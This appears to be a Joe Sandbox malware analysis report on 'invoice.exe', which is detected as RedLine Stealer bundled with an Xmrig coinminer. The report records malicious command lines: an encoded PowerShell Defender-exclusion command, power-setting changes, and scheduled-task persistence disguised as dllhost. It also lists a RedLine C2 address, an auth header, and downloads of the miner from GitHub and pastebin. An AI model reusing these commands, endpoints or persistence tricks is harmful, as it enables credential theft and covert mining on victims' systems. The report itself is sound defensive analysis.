Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice.exe

Overview

General Information

Sample name:invoice.exe
Analysis ID:1504580
MD5:6af6a7fac1197a9b12b28c0e4db8c18a
SHA1:357ae7d706de393d8743dbbe0d94bc87922643cf
SHA256:d0a2035c0431796c138a26d1c9a75142b613c5417dc96a9200723870d0b3a687
Infos:

Detection

MinerDownloader, RedLine, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected AntiVM3
Yara detected Generic MinerDownloader
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Encrypted powershell cmdline option found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • invoice.exe (PID: 6340 cmdline: "C:\Users\user\Desktop\invoice.exe" MD5: 6AF6A7FAC1197A9B12B28C0E4DB8C18A)
    • cmd.exe (PID: 3004 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Setup.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5100 cmdline: C:\Windows\system32\cmd.exe /c dir /b "*.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • 4usfliof.exe (PID: 4520 cmdline: "4usfliof.exe" MD5: B154114F2D13496DC9630CAC4E707672)
        • RegSvcs.exe (PID: 732 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • WerFault.exe (PID: 6604 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • yee9mbi69cm7.exe (PID: 5744 cmdline: "yee9mbi69cm7.exe" MD5: D076D83093CF70D43AE8202CB9603D0D)
        • RegSvcs.exe (PID: 5664 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
        • RegSvcs.exe (PID: 5100 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • conhost.exe (PID: 4176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • AppLaunch.exe (PID: 104280 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" MD5: 89D41E1CF478A3D3C2C701A27A5692B2)
            • cmd.exe (PID: 104356 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 104372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 104400 cmdline: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • WmiPrvSE.exe (PID: 7200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
            • cmd.exe (PID: 7276 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7368 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 7296 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7400 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk9049" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
        • WerFault.exe (PID: 5432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5744 -s 224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: RedLine

{"C2 url": "135.181.7.171:81", "Bot Id": "_\u0416", "Authorization Header": "101013a5e99e0857595aae297a11351d"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\HostData\logs.uceJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    C:\ProgramData\HostData\logs.uceJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      C:\ProgramData\HostData\logs.uceJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_MinerDownloader_3Yara detected Generic MinerDownloaderJoe Security
          0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000004.00000003.1664492512.0000000001272000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000004.00000002.1834530899.00000000009BD000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmpJoeSecurity_MinerDownloader_3Yara detected Generic MinerDownloaderJoe Security
                  Click to see the 12 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, ProcessId: 104280, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, ParentProcessId: 104280, ParentProcessName: AppLaunch.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 104356, ProcessName: cmd.exe
                  Sigma detected: Suspicious Execution of Powershell with Base64
                  Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" , CommandLine: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 104356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" , ProcessId: 104400, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" , CommandLine: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 104356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjADUASwBtAHMAOAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGwASgBhADgAYwBqADkAWgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB0AFcAQwAjAD4A" , ProcessId: 104400, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Schedule system process
                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, ParentProcessId: 104280, ParentProcessName: AppLaunch.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7276, ProcessName: cmd.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-09-05T01:45:44.734072+020028290562Crypto Currency Mining Activity Detected192.168.2.449739140.82.121.3443TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: invoice.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeAvira: detection malicious, Label: HEUR/AGEN.1317024
                  Found malware configuration
                  Source: 00000006.00000002.2891282410.0000000002401000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "135.181.7.171:81", "Bot Id": "_\u0416", "Authorization Header": "101013a5e99e0857595aae297a11351d"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeReversingLabs: Detection: 83%
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeReversingLabs: Detection: 87%
                  Multi AV Scanner detection for submitted file
                  Source: invoice.exeReversingLabs: Detection: 60%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\yee9mbi69cm7.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\4usfliof.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: invoice.exeJoe Sandbox ML: detected

                  Bitcoin Miner

                  barindex
                  Yara detected Xmrig cryptocurrency miner
                  Source: Yara matchFile source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1789091903.0000000006841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5100, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 104280, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\HostData\logs.uce, type: DROPPED
                  Source: invoice.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49739 version: TLS 1.2
                  Source: invoice.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: invoice.exe
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2894124210.0000000004D73000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Administrator\Desktop\Pch3lkinMinerBuilder\Task32Main\Task32Main\obj\Debug\Task32Main.pdb source: RegSvcs.exe, 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb3> source: RegSvcs.exe, 00000006.00000002.2889790802.0000000000807000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb2 source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008AC000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.000000000089D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegSvcs.exe, 00000006.00000002.2889790802.00000000008B8000.00000004.00000020.00020000.00000000.sdmp

                  Networking

                  barindex
                  Yara detected Generic MinerDownloader
                  Source: Yara matchFile source: 0000000B.00000002.1729806081.0000000001377000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1787181662.0000000000402000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000F.00000002.1789091903.0000000006971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5100, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 104280, type: MEMORYSTR
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 135.181.7.171:81
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: pastebin.com
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 135.181.7.171:81
                  Source: global trafficHTTP traffic detected: GET /raw/PTNbBX9V HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /S1lentHash/xmrig/raw/main/xmrig.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /S1lentHash/file_to_dwnld/raw/main/WinRing0x64.sys HTTP/1.1Host: github.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 172.67.19.24 172.67.19.24
                  Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                  Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
                  Source: Joe Sandbox ViewIP Address: 135.181.7.171 135.181.7.171
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.4:49739 -> 140.82.121.3:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownTCP traffic detected without corresponding DNS query: 135.181.7.171
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
